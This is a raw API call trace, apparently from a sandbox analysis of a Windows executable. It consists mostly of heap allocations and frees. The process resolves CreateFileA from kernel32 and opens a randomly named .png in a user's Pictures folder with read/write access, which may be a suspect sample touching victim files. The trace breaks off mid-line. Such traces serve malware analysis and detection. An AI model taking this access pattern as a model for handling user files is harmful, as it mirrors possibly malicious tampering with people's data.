[0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.100] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.103] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba3f0 [0191.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba3f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0191.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.103] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0191.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0191.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.104] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0191.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0191.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3b) returned 0x8db138 [0191.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", cchWideChar=59, lpMultiByteStr=0x8db138, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", lpUsedDefaultChar=0x0) returned 59 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.105] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ityvcrmyofcy 0-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x76) returned 0x8afee8 [0191.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=59, lpWideCharStr=0x8afee8, cchWideChar=59 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png") returned 59 [0191.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0191.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afee8 | out: hHeap=0x8a0000) returned 1 [0191.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.108] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0191.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: 